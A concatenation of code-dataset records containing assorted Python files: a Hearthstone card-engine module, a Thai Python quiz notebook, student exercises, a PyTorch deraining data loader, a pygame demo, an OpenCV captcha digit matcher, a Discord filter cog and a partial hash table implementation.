After this attacks and kills a minion, it may attack again\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_HulkingOverfiend(self)]\n\t\t\nclass Trig_HulkingOverfiend(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionAttackedMinion\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and subject == self.entity and self.entity.health > 0 \\\n\t\t\t\tand self.entity.dead == False and (target.health < 1 or target.dead == True)\n\t\t\t\t\n\tdef text(self, CHN):\n\t\treturn \"在该随从攻击并消灭一个随从后,可再次攻击\" if CHN \\\n\t\t\t\telse \"After this attacks and kills a minion, it may attack again\"\n\t\t\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.attChances_extra += 1\n\t\t\n\t\t\nclass Nethrandamus(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Dragon\", \"Nethrandamus\"\n\tmana, attack, health = 9, 8, 8\n\tindex = \"DHInitiate~Demon Hunter~Minion~9~8~8~Dragon~Nethrandamus~Battlecry~Legendary\"\n\trequireTarget, keyWord, description = False, \"\", \"Battlecry: Summon two random 0-Cost minions. (Upgrades each time a friendly minion dies!)\"\n\tpoolIdentifier = \"0-Cost Minions to Summon\"\n\t@classmethod\n\tdef generatePool(cls, Game):\n\t\treturn [\"%d-Cost Minions to Summon\"%cost for cost in Game.MinionsofCost.keys()], \\\n\t\t\t\t[list(Game.MinionsofCost[cost].values()) for cost in Game.MinionsofCost.keys()]\n\t\t\t\t\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsHand = [Trig_Nethrandamus(self)] #只有在手牌中才会升级\n\t\tself.progress = 0\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"战吼:随机召唤两个法力值消耗为(%d)的随从\"%self.progress if CHN \\\n\t\t\t\telse \"Battlecry: Summon two random %d-Cost minions\"%self.progress\n\t\t\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tcurGame = self.Game\n\t\tif curGame.mode == 0:\n\t\t\tif curGame.guides:\n\t\t\t\tminions = curGame.guides.pop(0)\n\t\t\telse:\n\t\t\t\tcost = self.progress\n\t\t\t\twhile cost not in curGame.MinionsofCost: #假设计数过高,超出了费用范围,则取最高的可选费用\n\t\t\t\t\tcost -= 1\n\t\t\t\tminions = npchoice(self.rngPool(\"%d-Cost Minions to Summon\"%cost), 2, replace=False)\n\t\t\t\tcurGame.fixedGuides.append(tuple(minions))\n\t\t\tpos = (self.pos, \"leftandRight\") if self.onBoard else (-1, \"totheRightEnd\")\n\t\t\tcurGame.summon([minion(curGame, self.ID) for minion in minions], pos, self.ID)\n\t\treturn None\n\t\t\nclass Trig_Nethrandamus(TrigHand):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionDies\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.inHand and target.ID == self.entity.ID\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"该随从在手牌中时,每有一个友方随从死亡便升级\" if CHN \\\n\t\t\t\telse \"Upgrades in hand each time a friendly minions dies\"\n\t\t\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.progress += 1\n\t\t\n\t\t\nDemonHunterInit_Indices = {\"DHInitiate~Demon Hunter~Spell~0~Blur\": Blur,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~1~Twin Slice\": TwinSlice,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~1~Second Slice~Uncollectible\": SecondSlice,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~1~1~2~Demon~Battlefiend\": Battlefiend,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~1~Consume Magic~Outcast\": ConsumeMagic,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~1~Mana 
Burn\": ManaBurn,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~1~2~1~Demon~Ur'zul Horror~Deathrattle\": UrzulHorror,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~1~2~1~None~Lost Soul~Uncollectible\": LostSoul,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~2~Blade Dance\": BladeDance,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~2~Feast of Souls\": FeastofSouls,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Weapon~2~1~2~Umberwing~Battlecry\": Umberwing,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~1~1~1~Demon~Felwing~Uncollectible\": Felwing,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~4~4~2~None~Altruis the Outcast~Legendary\": AltruistheOutcast,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~3~Eye Beam~Outcast\": EyeBeam,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~3~3~1~None~Wrathscale Naga\": WrathscaleNaga,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~4~5~3~None~Illidari Felblade~Rush~Outcast\": IllidariFelblade,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~4~4~4~None~Raging Felscreamer~Battlecry\": RagingFelscreamer,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~4~Soul Split\": SoulSplit,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~5~Command the Illidari\": CommandtheIllidari,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~5~2~6~Demon~Wrathspike Brute~Taunt\": WrathspikeBrute,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Weapon~7~4~3~Flamereaper\": Flamereaper,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~8~5~10~Demon~Hulking Overfiend~Rush\": HulkingOverfiend,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~9~8~8~Dragon~Nethrandamus~Battlecry~Legendary\": Nethrandamus,\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\n#The images/crops were initially in the Shadows folder. This is for batch moving the files.\n#if __name__ == \"__main__\":\n#\tfilename_List = []\n#\tfor key, value in DemonHunterInit_Indices.items():\n#\t\tfilename_List.append(value.__name__+\".png\")\n#\t\t\n#\tprint(filename_List)","sub_path":"DemonHunterInitiate.py","file_name":"DemonHunterInitiate.py","file_ext":"py","file_size_in_byte":23305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"378957769","text":"\n# coding: utf-8\n\n# # CPE-341, Quiz 2/2015 - Question Set A2\n# \n# - Iteration Design Pattern : List, Dictionary\n# - Using Class Die in a List\n\n# In[1]:\n\nget_ipython().magic('reload_ext load_style')\nget_ipython().magic('load_style talk.css')\n\n\n# In[20]:\n\n## รหัสประจำตัวนักศึกษา :\n## ชื่อนักศึกษา\n##\n## คลิก Run cell นี้เพียงครั้งเดียว\n##\n##\nimport datetime\ndatetime.datetime.now().isoformat()\n\n\n# ## Question 1 ( @2 pt x 2 = 4 pts )\n# \n# ### Q1.a \n# จงเขียนคำสั่ง เพื่อพิมพ์ค่าตัวเลขด้วย index ที่กำหนดให้ใน list `mynums` ต่อไปนี้ \n\n# In[3]:\n\n## ไม่แก้ไขข้อมูลใน cell นี้\n\nmynums = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5]\n\n\n# In[4]:\n\n## ANSWER Q1.a\n##\n##\nindex = 6 \n\n\n\n\n# ### Q1.b \n# จงเขียนคำสั่ง เพื่อพิมพ์ตัวเลขที่มีค่าน้อยกว่า 1 จาก list `mynums` ในข้อ (1.a)\n\n# In[5]:\n\n## ANSWER Q1.b\n##\n\n\n\n\n# In[ ]:\n\n\n\n\n# ## Question 2 ( @3 pts x 4 = 12 pts )\n# \n# ### Q2.a \n# จงสร้าง **list** เพื่อเก็บข้อมูลตัวเลขคี่ -13 ถึง 13 โดยใข้ `range`\n\n# In[6]:\n\n## ANSWER Q2.a\n##\n\n\n\n# ### Q2.b \n# จงสร้าง **list** เพื่อเก็บตัวเลขสุ่มในช่วง 1-12 จำนวน 20 ตัวเลข โดยใข้ฟังก์ชั่น `randint` จากไลบรารี `random`\n\n# In[7]:\n\n## ANSWER Q2.b\n##\nfrom random import randint \n\n\n\n\n# In[ ]:\n\n\n\n\n# ### Q2.c \n# จงหาผลรวมของ **list** ต่อไปนี้แล้วเก็บไว้ที่ตัวแปรชื่อ myTotal โดยใข้ฟังก์ชั่น `sum`\n# \n# 
```\n# myTest = [-38, 72, -33, 18, 96, -83, 57, 41]\n# ```\n\n# In[8]:\n\n## ANSWER Q1.c\n##\n\n\n\n\n# In[ ]:\n\n\n\n\n# ### Q2.d \n# จงเขียน `def` ชื่อ `average` สำหรับหาค่าเฉี่ยของตัวเลขใน **list** `numbers` ที่เป็น argument \n# \n# เช่น เมื่อเรียกใช้ `average()` จะได้ผลลัพธ์ดังงนี้\n# \n# **Hint:**__ ใช้ฟังก์ชัน `sum` และ `len` เพื่อหาค่าเฉลี่ย\n\n# In[9]:\n\n# ตีวอย่างการหาค่า float (ตัวเลขมีทศนิยม)\ni = 5\nprint( float(i) )\n\n\n# In[10]:\n\n## ANSWER Q2.d\n##\n\ndef average(numbers):\n pass\n\n\n\n# In[11]:\n\n## Test average()\nmynums = [i for i in range(51,101,5) ]\n\nprint(mynums)\naverage(mynums)\n\n\n# In[ ]:\n\n\n\n\n# ## Question 3 ( @6 pts x 2 = 12 pts )\n# \n# ### Q3.a \n# กำหนดให้ **dict** `NZ_COINS` เก็บค่าเงินของเหรียญนิวซีแลนด์ 5 ชนิด (ใช้ใน Q3.b)\n# \n# จงหาจำนวนเหรียญทั้งหมดใน list `mypiggy` ซึ่งเป็นกระปุกเงินเก็บเหรียญ\n\n# In[12]:\n\n## ไม่แก้ไขข้อมูลใน cell นี้\n\n## เหรียญเงินนิวซีแลนด์ เช่น '20c' หมายถึง 20 cents, '2$' หมายถึง 2 Dollars \nNZ_COINS = { \"10c\": 0.10, \"20c\": 0.20, \"50c\": 0.50, \"1$\": 1, \"2$\": 2 } \n\n## mypiggy keeps the number of NZ coins \nmypiggy = { \"20c\": 11, \"2$\": 4, \"10c\": 5, \"1$\": 12 }\n\n\n# In[13]:\n\n## ANSWER Q3.a\n## หาจำนวนเหรียญทั้งหมดใน list mypiggy \n##\n\n\n\n\n\n# In[ ]:\n\n\n\n\n# ### Q3.b\n# จงหามูลค่าของเงินทั้งหมดใน list `mypiggy` (หน่วย: ดอลลาร์ นิวซีแลนด์)\n\n# In[14]:\n\n## ANSWER Q3.b\n## \n\n\n\n\n# In[ ]:\n\n\n\n\n# ## Question 4 ( @6 pts x 2 = 12 pts )\n# \n# ### Q4.a \n# จาก class `Die` ที่กำหนดให้ จงสร้างลูกเต๋าเก็บไว้ใน list ชื่อ `my2dice` สองลูก แล้วหาค่าผลรวมของหน้าลูกเต๋าสองลูกนั้น\n\n# In[15]:\n\n## ไม่แก้ไขข้อมูลใน cell นี้\nfrom random import randint\n\nclass Die(object):\n def __init__(self):\n \"\"\" สร้างลูกเต๋า 1 ลุก 6 หน้า ที่มีค่าเริ่มต้นค่าสุ่ม 1..6 \"\"\"\n self.__face = randint(1,6)\n @property\n def face(self):\n \"\"\" return เลขหน้าลูกเต๋า 1..6 \"\"\"\n return self.__face\n \n def roll(self):\n \"\"\" ทอดลุกเต๋า เลขหน้าลูกเต๋าจะเปลี่ยนด้วยค่า random 1..6 \"\"\"\n self.__face = randint(1,6)\n \n def __str__(self):\n \"\"\" return ข้อความ str, พร้อมกับเลขหน้าลูกเต๋า \"\"\"\n return ( \"Die face: {}\".format(self.__face) )\n \n\n\n# In[16]:\n\nhelp(Die)\n\n\n# In[17]:\n\n## ANSWER Q4.a\n##\n##\n\n\n\n\n\n\n# In[ ]:\n\n\n\n\n# ### Q4.b \n# จงปรับปรุุง def `printDiceStat` เพื่อหาสถิติ (เปอร์เซ็นต์) ของการทอดลูกเต๋า จำนวน 1,000 ครั้ง โดยพิมพ์สถิติของหน้าลุกเต๋าทุกหน้า `1..6` โดยจะพิมพ์สถิติตามตัวอย่างต่อไปนี้\n# \n# ```\n# Number of rolls: 1000\n# \n# ---------- Dice Stats -----------\n# face <= 3 count: 497, 49.70 %\n# face > 3 count: 503, 50.30 % \n# ```\n# \n\n# In[18]:\n\ndef printDiceStat( numberRolls ):\n \"\"\" numberRolls : the number of rolls \"\"\"\n \n die = Die()\n\n # เก็บจำนวนครั้งที่ได้หน้าูลูกเต๋า <= 3 ที่ index = 0, จำนวนครั้งที่หน้าูลูกเต๋า > 3 ที่ index = 1 \n counts = [0, 0] \n \n \n \n \n \n \n \n print(\"Number of rolls: {}\".format(numberRolls)) \n \n print(\"\\n---------- Dice Stats -----------\") \n percentage = 100. 
* counts[0] / numberRolls\n print(\"face {} count: {:>3}, {:6.2f} %\".format( \"<= 3\", counts[0], percentage )) \n \n \n \n \n\n#--- Test the def printDiceStat ---\nrolls = 1000\nprintDiceStat( rolls )\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n\n# In[21]:\n\nimport datetime\ndatetime.datetime.now().isoformat()\n##\n## รหัสประจำตัวนักศึกษา :\n##\n## แล้วคลิก Run cell ครั้งเดียว เมื่อส่งงาน\n\n\n# ## end of IPynb\n","sub_path":"notebooks/cpe341_HW4_setA2_name_student_id.py","file_name":"cpe341_HW4_setA2_name_student_id.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"349742774","text":"# DannyAugustRamaputra_1706019791_lab07a.py\n# This program translates a numerical string into numbers then prints it to console\n#\n# A recursive function is used to process every the numerical string\n# and a seperate function is used to convert the strings into numbers\n# then prints it to the console.\n\n# define main functtion\ndef main():\n words = input(\"Please give a sequence of word: \") # get the string from user\n listOfWords = words.split() # create a list containing each numerical string\n showDigits(listOfWords)\n\n# Recursive function for translating a list of numeric words\n# into a sequence of digits and print them\ndef showDigits(listOfWords):\n if len(listOfWords) == 1: # base case\n printDigit(listOfWords[0]) # use printDigit() on the first word in list\n\n else: # recursive case\n printDigit(listOfWords[0]) # use printDigit() on the first word in list\n showDigits(listOfWords[1:]) # pass the remaining words in list into this function\n\n# Function for translating one word and printing the digit\ndef printDigit(word):\n # create a dictionary containing the key and value pairs for every numerical string\n wordSet = {\"one\":1, \"two\":2, \"three\":3, \"four\":4, \"five\":5,\n \"six\":6, \"seven\":7, \"eight\":8, \"nine\":9, \"zero\":0}\n # prints number into console, without new line\n print(wordSet[word], end = \"\")\n\n# run the main() function\nmain()\n","sub_path":"fprog_lab/lab07/Danny_August_Ramaputra_1706019791_lab07a.py","file_name":"Danny_August_Ramaputra_1706019791_lab07a.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"25372899","text":"\"\"\"\nFile: testmyrange.py\nProject 6.14\n\nDefines a function that behaves like Python's range function.\n\n\"\"\"\n \ndef myRange(start, stop = None, step = None):\n lyst = []\n if stop == None and step == None:\n stop = start\n start = 0\n step = 1\n if start < stop:\n if step == None:\n step = 1\n elif step <= 0:\n return lyst\n while start < stop:\n lyst.append(start)\n start += step\n else:\n if step == None or step > -1:\n return lyst\n while start > stop:\n lyst.append(start)\n start += step\n return lyst\n \ndef main():\n print(myRange(10))\n print(myRange(1, 10))\n print(myRange(1, 10, 2))\n print(myRange(10, 1, -1))\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"Exercises/6.14.py","file_name":"6.14.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"631078138","text":"from functools import reduce\r\n\r\nfrom PIL import Image, ImageFilter, ImageDraw\r\nfrom os import getcwd\r\n\r\n__author__ = 'oglandx'\r\n\r\n\r\ndef get_lines(path):\r\n with open(path) as file:\r\n return {\r\n line: content.strip()\r\n for line, content in 
enumerate(file)\r\n }\r\n\r\n\r\ndef get_class_paths(classes_file, paths_file):\r\n classes = get_lines(classes_file)\r\n paths = get_lines(paths_file)\r\n if len(classes) != len(paths):\r\n raise AssertionError(\"Lengths of files must be the same\")\r\n return {\r\n int(cls): [\r\n paths.get(_line) for _line, _cls in classes.items()\r\n if _cls == cls\r\n ] for cls in set(classes.values())\r\n }\r\n\r\n\r\ndef get_class_paths_limited(classes_file, paths_file, min_items_in_class=15, limit=None, **kwargs):\r\n return {\r\n cls: values[:limit] for cls, values in get_class_paths(classes_file, paths_file).items()\r\n if len(values) > min_items_in_class\r\n }\r\n\r\n\r\ndef get_colors(image, colors_num=10, swatch_size=10):\r\n '''\r\n https://gist.github.com/zollinger/1722663\r\n '''\r\n\r\n resize = min(image.width, image.height)\r\n image = image.resize((resize, resize))\r\n result = image.convert('P', palette=Image.ADAPTIVE, colors=colors_num)\r\n result.putalpha(0)\r\n colors = result.getcolors(resize*resize)\r\n\r\n pal = Image.new('RGB', (swatch_size*colors_num, swatch_size))\r\n\r\n draw = ImageDraw.Draw(pal)\r\n posx = 0\r\n for count, col in colors:\r\n draw.rectangle([posx, 0, posx + swatch_size, swatch_size], fill=col)\r\n posx += swatch_size\r\n del draw\r\n\r\n return pal\r\n\r\n\r\ndef img_prepare_func_pillow(path, **kwargs):\r\n raise NotImplementedError()\r\n\r\n\r\ndef img_prepare_func_cv(path, **kwargs):\r\n raise NotImplementedError()\r\n\r\n\r\ndef get_images_with_limit_class_items_im(classes_file, paths_file, root=None,\r\n img_prepare_func=None, exclude=None, **kwargs):\r\n if not root:\r\n root = getcwd()\r\n if not img_prepare_func:\r\n img_prepare_func = img_prepare_func_pillow\r\n if not exclude:\r\n exclude = []\r\n return {\r\n cls: [img_prepare_func('%s/%s' % (root, path), **kwargs) for path in paths]\r\n for cls, paths in get_class_paths_limited(classes_file, paths_file, **kwargs).items()\r\n if cls not in exclude\r\n }\r\n\r\n\r\ndef prepare(config):\r\n return get_images_with_limit_class_items_im(\r\n config.classes,\r\n config.paths,\r\n config.root,\r\n img_prepare_func=config.prepare,\r\n size=config.size,\r\n conversion_mode=config.conversion,\r\n min_items_in_class=config.min_items_in_class,\r\n limit=config.limit_items_for_class,\r\n exclude=config.exclude_classes,\r\n )\r\n","sub_path":"py/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"68217732","text":"\nimport torch.utils.data as data\nfrom PIL import Image\nfrom random import randrange\nfrom torchvision.transforms import Compose, ToTensor, Normalize\nimport pdb\nimport numpy as np\n# --- Training dataset --- #\nclass TrainData(data.Dataset):\n    def __init__(self, crop_size, train_data_dir,train_filename):\n        super().__init__()\n        train_list = train_data_dir + train_filename #+'trainlist.txt'\n        print(train_list)\n        with open(train_list) as f:\n            contents = f.readlines()\n            haze_names = [i.strip() for i in contents]\n            gt_names = [i.strip().replace('rain','norain') for i in haze_names]\n\n        self.haze_names = haze_names\n        self.gt_names = gt_names\n        self.crop_size = crop_size\n        self.train_data_dir = train_data_dir\n\n    def get_images(self, index):\n        crop_width, crop_height = self.crop_size\n        \n        haze_name = self.haze_names[index]\n        gt_name = self.gt_names[index]\n\n\n        haze_img = Image.open(self.train_data_dir + haze_name)\n\n        try:\n            gt_img = Image.open(self.train_data_dir + 
gt_name)\n        except Exception:\n            gt_img = Image.open(self.train_data_dir + gt_name).convert('RGB')\n\n        width, height = haze_img.size\n        # print(width,height,width - crop_width,height - crop_height)\n        # if width < crop_width and height < crop_height :\n        #     haze_img = haze_img.resize((crop_width,crop_height), Image.ANTIALIAS)\n        #     gt_img = gt_img.resize((crop_width, crop_height), Image.ANTIALIAS)\n        # elif width < crop_width :\n        #     haze_img = haze_img.resize((crop_width,height), Image.ANTIALIAS)\n        #     gt_img = gt_img.resize((crop_width,height), Image.ANTIALIAS)\n        # elif height < crop_height :\n        #     haze_img = haze_img.resize((width,crop_height), Image.ANTIALIAS)\n        #     gt_img = gt_img.resize((width, crop_height), Image.ANTIALIAS)\n\n        # wd_new = int(16*np.ceil(haze_img.size[0]/16.0))\n        # ht_new = int(16*np.ceil(haze_img.size[1]/16.0))\n        \n        # width, height = haze_img.size\n        # haze_img = haze_img.resize((crop_width,crop_height), Image.ANTIALIAS)\n        # gt_img = gt_img.resize((crop_width,crop_height), Image.ANTIALIAS)\n        # print(haze_name,width,height,width - crop_width,height - crop_height)\n        # --- x,y coordinate of left-top corner --- #\n        x, y = randrange(0, width - crop_width + 1), randrange(0, height - crop_height + 1)\n        haze_crop_img = haze_img.crop((x, y, x + crop_width, y + crop_height))\n        gt_crop_img = gt_img.crop((x, y, x + crop_width, y + crop_height))\n        width, height = haze_crop_img.size\n        # print(width,height)\n\n\n        # --- Transform to tensor --- #\n        transform_haze = Compose([ToTensor(), Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n        transform_gt = Compose([ToTensor()])\n        haze = transform_haze(haze_crop_img)\n        gt = transform_gt(gt_crop_img)\n\n        # --- Check the channel is 3 or not --- #\n        # use != here: `is not` compares object identity, which is unreliable for int literals\n        if list(haze.shape)[0] != 3 or list(gt.shape)[0] != 3:\n            raise Exception('Bad image channel: {}'.format(gt_name))\n\n        return haze, gt\n\n    def __getitem__(self, index):\n        res = self.get_images(index)\n        return res\n\n    def __len__(self):\n        return len(self.haze_names)\n\n","sub_path":"train_data.py","file_name":"train_data.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"75930215","text":"import pygame\nimport random\n\nWIDTH=800\nHEIGHT=600\n# RGB\nWHITE=(255,255,255)\nBLUE=(0,0,255)\nRED=(255,0,0)\n\ngame_display=pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"Blob World\")\nclock=pygame.time.Clock()\n\nclass Blob:\n\n    def __init__(self,color):\n        self.x=random.randrange(0,WIDTH)\n        self.y=random.randrange(0,HEIGHT)\n        self.size=random.randrange(4,8)\n        self.color=color\n\n    def move(self):\n        self.move_x=random.randrange(-1,2)\n        self.move_y = random.randrange(-1, 2)\n        self.x+=self.move_x\n        self.y+=self.move_y\n\n        if self.x<0:self.x=0\n        elif self.x>WIDTH:self.x=WIDTH\n\n        if self.y < 0:self.y = 0\n        elif self.y >HEIGHT:self.y = HEIGHT\n\n\ndef draw_environment(blob):\n    # this is used to redraw the frame every time the frame is reloaded\n    game_display.fill(WHITE)\n    # this line is after the fill\n    pygame.draw.circle(game_display,blob.color,[blob.x,blob.y],blob.size)\n    pygame.display.update()\n    blob.move()\n\n\ndef main():\n    red_blob=Blob(RED)\n\n    while True:\n        for event in pygame.event.get():\n            if event.type==pygame.QUIT:\n                pygame.quit()\n                quit()\n\n        draw_environment(red_blob)\n        clock.tick(60)\n        print(red_blob.x,red_blob.y)\n\nif __name__=='__main__':\n    main()","sub_path":"14_creating an environment for our 
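# --- Editor's addition (illustrative sketch, not part of the original file). ---
# TrainData.get_images above keeps the rainy input and its ground truth aligned
# by sampling one (x, y) corner and cropping both images with the same box:
from random import randrange

def paired_crop_box(width, height, crop_w, crop_h):
    """One crop box, valid for both an image and its ground-truth pair."""
    x = randrange(0, width - crop_w + 1)
    y = randrange(0, height - crop_h + 1)
    return (x, y, x + crop_w, y + crop_h)

box = paired_crop_box(640, 480, 256, 256)
print(box)   # e.g. (113, 58, 369, 314); use haze_img.crop(box) and gt_img.crop(box)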
object.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"433737565","text":"import os\nimport sys\n\nBASE_COMMAND = \"vagrant ssh -c '%s'\"\n\ndef print_and_run_system(cmd):\n print(\"[Exec] \" + BASE_COMMAND % cmd)\n os.system(BASE_COMMAND % cmd)\n\nif __name__ == '__main__':\n if sys.argv[1] == 'runserver':\n if len(sys.argv) == 2:\n sys.argv.append('[::]:8000')\n else:\n sys.argv[2] = '[::]:' + sys.argv[2]\n print_and_run_system(\"python manage.py \" + \" \".join(sys.argv[1:]))\n","sub_path":"vmanage.py","file_name":"vmanage.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"296347885","text":"import cv2\nimport numpy as np\n\ndef find_contours_examples():\n examples = []\n for i in range(10):\n digit = cv2.imread(str(i) + '.png')\n digit_grey = cv2.cvtColor(digit, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(digit_grey, 127, 255, cv2.THRESH_BINARY_INV) # inverse thresh to remove out border\n digit2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n print(hierarchy[0])\n print(len(hierarchy[0]))\n for j in range(len(hierarchy[0])):\n if hierarchy[0][j][3] == -1: # if contour doesn't have parent\n examples.append(contours[j])\n break\n return examples\n\ndef find_contours_captcha(path, t, b, l, r):\n screen = cv2.imread(path)\n captcha = screen[t:b, l:r]\n captcha_grey = cv2.cvtColor(captcha, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(captcha_grey, 127, 255, cv2.THRESH_BINARY_INV) # inverse thresh to remove out border\n captcha2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n contours = []\n for i in range(len(hierarchy[0])):\n if hierarchy[0][i][3] == -1: # if contour doesn't have parent\n contours.append(contours[i])\n break\n return contours\n\ndef image_recognition(examples, contours):\n result = []\n for contour in contours:\n lst = []\n for example in examples:\n lst.append(cv2.matchShapes(contour, example, 3, 0.0))\n x, y, w, h = cv2.boundingRect(contour)\n result.append((x, lst.index(min(lst))))\n result.sort()\n result = [str(i[1]) for i in result]\n print(''.join(result))\n\n\n\n\n\n\n\n\n","sub_path":"image_recognition.py","file_name":"image_recognition.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"247160295","text":"import discord\r\nimport asyncio\r\nfrom discord.ext import commands\r\n\r\nclass Blacklist:\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n async def on_message(self, message):\r\n if message.author == self.client.user:\r\n return\r\n if message.author.bot: return\r\n if 'kokot' in message.content:\r\n await self.client.delete_message(message)\r\n await self.client.send_message(message.author, \"Keyword `kokot` is not allowed on Qwesdy's Server\")\r\n await self.client.send_message(message.channel, \"That keyword is not allowed here\")\r\n\r\ndef setup(client):\r\n client.add_cog(Blacklist(client))\r\n","sub_path":"blacklist.py","file_name":"blacklist.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"114415927","text":"from linkedlist import Node, LinkedList\n\nclass HashTableEntry:\n \"\"\"\n Linked List hash table key/value pair\n \"\"\"\n def __init__(self, 
key, value):\n        self.key = key\n        self.value = value\n    \n    def __str__(self):\n        return f\"<HashTableEntry {self.key}: {self.value}>\"\n\n\n# Hash table can't have fewer than this many slots\nMIN_CAPACITY = 8\n\n\nclass HashTable:\n    \"\"\"\n    A hash table with `capacity` buckets\n    that accepts string keys\n\n    Implement this.\n    \"\"\"\n\n    def __init__(self, capacity):\n        # ensure we are not below capacity\n        if capacity < MIN_CAPACITY:\n            capacity = MIN_CAPACITY\n        \n        # set up storage using one independent LinkedList per slot;\n        # [LinkedList()] * capacity would alias a single list across every bucket\n        self.data = [LinkedList() for _ in range(capacity)]\n        self.capacity = capacity\n        \n        # when the hashtable's load factor is greater\n        # than this, it should be resized\n        self.resizeWhenLoadFactorGreaterThan = 0.7\n        \n        # the count of items in the HT\n        self.count = 0\n\n\n    def get_num_slots(self):\n        \"\"\"\n        Return the length of the list you're using to hold the hash\n        table data. (Not the number of items stored in the hash table,\n        but the number of slots in the main list.)\n\n        One of the tests relies on this.\n\n        Implement this.\n        \"\"\"\n        return len(self.data)\n\n\n    def get_load_factor(self):\n        \"\"\"\n        Return the load factor for this hash table.\n\n        Implement this.\n        \"\"\"\n        return self.count / self.capacity\n\n\n    def fnv1(self, key):\n        \"\"\"\n        FNV-1 Hash, 64-bit\n\n        Implement this, and/or DJB2.\n        \"\"\"\n        # XOR then multiply per character (FNV-1a order),\n        # folded into the table size at every step\n        hval = 0x811c9dc5\n        fnv_32_prime = 0x01000193\n        for s in key:\n            hval = hval ^ ord(s)\n            hval = (hval * fnv_32_prime) % self.capacity\n        return hval\n\n\n    def djb2(self, key):\n        \"\"\"\n        DJB2 hash, 32-bit\n\n        Implement this, and/or FNV-1.\n        \"\"\"\n        # classic djb2: h = h * 33 + ord(ch), masked to 32 bits\n        hval = 5381\n        for s in key:\n            hval = (hval * 33 + ord(s)) & 0xFFFFFFFF\n        return hval % self.capacity\n\n\n    # this is not being used anywhere--I am taking care\n    # of the % in the hash itself\n    def hash_index(self, key):\n        \"\"\"\n        Take an arbitrary key and return a valid integer index\n        between within the storage capacity of the hash table.\n        \"\"\"\n        return self.fnv1(key) % self.capacity\n\n    def put(self, key, value):\n        \"\"\"\n        Store the value with the given key.\n\n        Hash collisions should be handled with Linked List Chaining.\n\n        Implement this.\n        \"\"\"\n        # Hash the key and search only its bucket to see if this key 